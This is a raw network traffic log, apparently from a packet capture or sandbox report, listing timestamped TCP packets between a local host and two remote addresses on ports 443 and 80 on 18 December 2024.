                                                                                        Dec 18, 2024 02:10:04.628206968 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.628835917 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.628911972 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.629188061 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.629246950 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.629466057 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.629477024 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.670902014 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.718919039 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:04.766869068 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.767146111 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.767180920 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.767713070 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.768153906 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.768223047 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:04.768500090 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:04.811366081 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.323055983 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:05.450140953 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.450258970 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.450328112 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.450342894 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.458136082 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.458225965 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.458235025 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.470921993 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.471009970 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.471023083 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.481349945 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.481432915 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.481440067 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.490983009 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.491055965 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.491060972 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.530884981 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.569776058 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.569983006 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.570045948 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.570055962 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.572978973 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.573191881 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.573272943 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.573302984 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.573333979 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.573396921 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.584151030 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.602998018 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.603121042 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.603148937 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.604882002 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.604943991 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.604955912 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.610095024 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.610100985 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.617554903 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.617626905 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.617647886 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.627109051 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.627187014 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.627204895 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.643416882 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.643512011 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.643520117 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.648397923 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.648472071 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.648478031 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:05.673939943 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:05.689901114 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.119210005 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.120521069 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.120604992 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.120650053 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.120667934 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.120722055 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.121427059 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.122421026 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.122484922 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.122490883 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.143424988 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.143512011 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.143522978 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.143924952 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.144134045 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.144140005 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.145792961 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.145869970 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.145875931 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.174985886 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.201323986 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.201359034 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.215945005 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.239461899 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.240287066 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.240326881 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.240355015 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.240362883 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.240417957 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.241134882 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.241205931 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.241244078 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.241790056 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.242615938 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.242676020 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.242681980 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.242722988 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.242775917 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.242786884 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.244174957 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.244283915 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.244298935 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.244920015 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.244972944 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.244988918 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.245707035 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.245765924 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.245779991 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.246490002 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.246548891 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.246556044 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.253809929 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.253915071 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.253925085 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.269361019 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.269407988 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.269455910 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.269490957 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.269540071 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.270203114 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.270281076 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.270292997 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.270860910 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.271616936 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.271672010 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.271672010 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.271699905 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.271730900 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.271737099 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.272416115 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.272469044 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.272488117 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.273180962 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.273228884 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.273247957 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.273936987 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.273984909 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.274005890 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.274915934 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.274972916 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.274980068 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.275485039 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.275518894 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.275532007 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.275537968 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.275584936 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.276195049 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.276994944 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.277036905 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.277043104 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.277760029 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.277806997 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.277812958 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.278907061 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.278953075 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.278959990 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.285662889 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.285741091 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.285751104 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.293121099 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.293185949 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.293195009 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.307501078 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.307569027 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.307574987 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.311732054 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.311806917 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.311811924 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.327990055 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.328059912 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.359883070 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.371409893 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.371481895 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.371524096 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.371531963 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.372090101 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.372128963 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.372144938 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.372186899 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.372242928 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.372842073 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.372896910 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.372903109 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.373593092 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.377461910 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.377516031 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.377521992 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.380043030 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.380108118 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.380141020 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.384969950 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.385019064 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.385024071 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.388923883 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.388982058 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.389013052 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.399857044 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.399915934 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.399920940 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.406373978 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.406441927 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.406469107 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.407392979 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.407452106 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.407457113 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.414902925 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.414949894 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.414954901 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.415457010 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.415513992 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.415544033 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.422400951 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.422451973 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.422457933 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.423887968 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.423944950 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.423966885 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.430028915 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.430079937 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.430085897 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.432648897 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.432697058 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.432717085 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.437525034 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.437580109 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.437586069 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.441576004 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.441625118 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.441653967 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.445060968 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.445116043 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.445122004 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.450404882 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.450453043 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.450480938 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.459193945 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.459245920 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.459270000 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.459924936 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.459997892 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.460007906 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.467482090 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.467552900 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.467565060 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.475147009 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.475239038 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.475245953 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.475267887 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.475331068 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.475389004 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.495855093 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.495902061 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.495919943 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.495929956 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.495968103 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.499231100 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.499277115 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.499304056 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.499341965 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.499388933 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.499988079 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.500653982 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.504064083 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.504148960 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.504163980 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.504998922 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.505057096 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.505065918 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.509341955 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.509397984 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.509406090 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.510514975 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.510574102 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.510591030 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.513592958 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.513644934 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.513652086 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.517198086 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.517273903 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.517297983 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.517864943 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.517930984 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.517937899 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.521910906 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.521962881 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.521971941 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.523616076 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.523770094 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.523801088 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.530114889 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.530174017 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.530189991 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.530194044 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.530249119 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.530266047 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.534291983 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.534339905 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.534347057 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.534894943 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:06.536521912 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.536573887 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.536585093 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.537121058 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.537184954 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.537198067 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.544543028 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.544608116 CET49714443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.544619083 CET44349714172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.548188925 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.548249960 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.548259974 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.555389881 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.555457115 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.555465937 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.563204050 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.563266039 CET49713443192.168.2.16172.217.19.238
                                                                                        Dec 18, 2024 02:10:06.563275099 CET44349713172.217.19.238192.168.2.16
                                                                                        Dec 18, 2024 02:10:06.564660072 CET44349713172.217.19.238192.168.2.16
